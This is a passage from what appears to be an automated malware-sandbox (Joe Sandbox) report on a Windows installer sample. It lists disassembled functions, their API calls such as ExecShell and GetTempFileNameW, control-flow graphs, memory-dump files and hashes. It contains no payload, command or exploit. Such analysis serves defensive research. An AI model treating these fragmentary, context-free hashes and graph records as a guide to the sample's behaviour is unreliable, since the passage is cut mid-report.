                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                  • API String ID: 3156913733-2180253247
                                  • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                  • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                  • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                  • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 731 405e7f-405e8b 732 405e8c-405ec0 GetTickCount GetTempFileNameW 731->732 733 405ec2-405ec4 732->733 734 405ecf-405ed1 732->734 733->732 736 405ec6 733->736 735 405ec9-405ecc 734->735 736->735
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00405E9D
                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: nsa
                                  • API String ID: 1716503409-2209301699
                                  • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                  • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                  • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                  • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 737 4078c5-4078cb 738 4078d0-4078eb 737->738 739 4078cd-4078cf 737->739 740 407aeb-407aff 738->740 741 407bad-407bba 738->741 739->738 743 407b01-407b17 740->743 744 407b19-407b2c 740->744 742 407be7-407beb 741->742 745 407c4a-407c5d 742->745 746 407bed-407c0c 742->746 747 407b33-407b3a 743->747 744->747 750 407c65-407c68 745->750 751 407c25-407c39 746->751 752 407c0e-407c23 746->752 748 407b61-407b64 747->748 749 407b3c-407b40 747->749 748->750 753 407b46-407b5e 749->753 754 407ccd-407cd4 749->754 758 407350 750->758 759 407cec 750->759 755 407c3c-407c43 751->755 752->755 753->748 757 407cdd-407cea 754->757 760 407be1-407be4 755->760 761 407c45 755->761 762 407cef-407cf6 757->762 763 407357-40735b 758->763 764 40749b-4074b6 758->764 765 40746d-407471 758->765 766 4073ff-407403 758->766 759->762 760->742 768 407cd6 761->768 769 407bc6-407bde 761->769 763->757 771 407361-40736e 763->771 764->740 772 407c76-407c7d 765->772 773 407477-40748b 765->773 774 407409-407420 766->774 775 407c6d-407c74 766->775 768->757 769->760 771->759 776 407374-4073ba 771->776 772->757 777 40748e-407496 773->777 778 407423-407427 774->778 775->757 780 4073e2-4073e4 776->780 781 4073bc-4073c0 776->781 777->765 782 407498 777->782 778->766 779 407429-40742f 778->779 783 407431-407438 779->783 784 407459-40746b 779->784 787 4073f5-4073fd 780->787 788 4073e6-4073f3 780->788 785 4073c2-4073c5 GlobalFree 781->785 786 4073cb-4073d9 GlobalAlloc 781->786 782->764 789 407443-407453 GlobalAlloc 783->789 790 40743a-40743d GlobalFree 783->790 784->777 785->786 786->759 791 4073df 786->791 787->778 788->787 788->788 789->759 789->784 790->789 791->780
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                  • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                  • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                  • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 792 407ac3-407ac7 793 407ac9-407bba 792->793 794 407ade-407ae4 792->794 804 407be7-407beb 793->804 796 407aeb-407aff 794->796 797 407b01-407b17 796->797 798 407b19-407b2c 796->798 801 407b33-407b3a 797->801 798->801 802 407b61-407b64 801->802 803 407b3c-407b40 801->803 807 407c65-407c68 802->807 805 407b46-407b5e 803->805 806 407ccd-407cd4 803->806 808 407c4a-407c5d 804->808 809 407bed-407c0c 804->809 805->802 810 407cdd-407cea 806->810 816 407350 807->816 817 407cec 807->817 808->807 812 407c25-407c39 809->812 813 407c0e-407c23 809->813 815 407cef-407cf6 810->815 814 407c3c-407c43 812->814 813->814 823 407be1-407be4 814->823 824 407c45 814->824 818 407357-40735b 816->818 819 40749b-4074b6 816->819 820 40746d-407471 816->820 821 4073ff-407403 816->821 817->815 818->810 825 407361-40736e 818->825 819->796 826 407c76-407c7d 820->826 827 407477-40748b 820->827 829 407409-407420 821->829 830 407c6d-407c74 821->830 823->804 831 407cd6 824->831 832 407bc6-407bde 824->832 825->817 833 407374-4073ba 825->833 826->810 834 40748e-407496 827->834 835 407423-407427 829->835 830->810 831->810 832->823 837 4073e2-4073e4 833->837 838 4073bc-4073c0 833->838 834->820 839 407498 834->839 835->821 836 407429-40742f 835->836 840 407431-407438 836->840 841 407459-40746b 836->841 844 4073f5-4073fd 837->844 845 4073e6-4073f3 837->845 842 4073c2-4073c5 GlobalFree 838->842 843 4073cb-4073d9 GlobalAlloc 838->843 839->819 846 407443-407453 GlobalAlloc 840->846 847 40743a-40743d GlobalFree 840->847 841->834 842->843 843->817 848 4073df 843->848 844->835 845->844 845->845 846->817 846->841 847->846 848->837
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                  • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                  • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                  • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 849 407312-407330 850 407332-407335 849->850 851 40733a-407341 849->851 852 407cf0-407cf6 850->852 853 407344-40734a 851->853 854 407350 853->854 855 407cec 853->855 856 407357-40735b 854->856 857 40749b-407aff 854->857 858 40746d-407471 854->858 859 4073ff-407403 854->859 860 407cef 855->860 861 407361-40736e 856->861 862 407cdd-407cea 856->862 870 407b01-407b17 857->870 871 407b19-407b2c 857->871 863 407c76-407c7d 858->863 864 407477-40748b 858->864 866 407409-407420 859->866 867 407c6d-407c74 859->867 860->852 861->855 868 407374-4073ba 861->868 862->860 863->862 869 40748e-407496 864->869 872 407423-407427 866->872 867->862 874 4073e2-4073e4 868->874 875 4073bc-4073c0 868->875 869->858 876 407498 869->876 877 407b33-407b3a 870->877 871->877 872->859 873 407429-40742f 872->873 880 407431-407438 873->880 881 407459-40746b 873->881 884 4073f5-4073fd 874->884 885 4073e6-4073f3 874->885 882 4073c2-4073c5 GlobalFree 875->882 883 4073cb-4073d9 GlobalAlloc 875->883 876->857 878 407b61-407c68 877->878 879 407b3c-407b40 877->879 878->853 886 407b46-407b5e 879->886 887 407ccd-407cd4 879->887 888 407443-407453 GlobalAlloc 880->888 889 40743a-40743d GlobalFree 880->889 881->869 882->883 883->855 891 4073df 883->891 884->872 885->884 885->885 886->878 887->862 888->855 888->881 889->888 891->874
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                  • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                  • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                  • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                  • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                  • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                  • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                  • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                  • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                  • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                  • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                  • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                  • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                  APIs
                                  • GlobalFree.KERNELBASE(?), ref: 004073C5
                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                  • GlobalFree.KERNELBASE(?), ref: 0040743D
                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree
                                  • String ID:
                                  • API String ID: 3394109436-0
                                  • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                  • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                  • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                  • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                  • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                  • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                  • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                  • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                  • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                  • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                  • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                  • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                  • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                  • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                  • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                  • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                  APIs
                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                  • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Char$Next$CreateDirectoryPrev
                                  • String ID:
                                  • API String ID: 4115351271-0
                                  • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                  • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                  • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                  • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
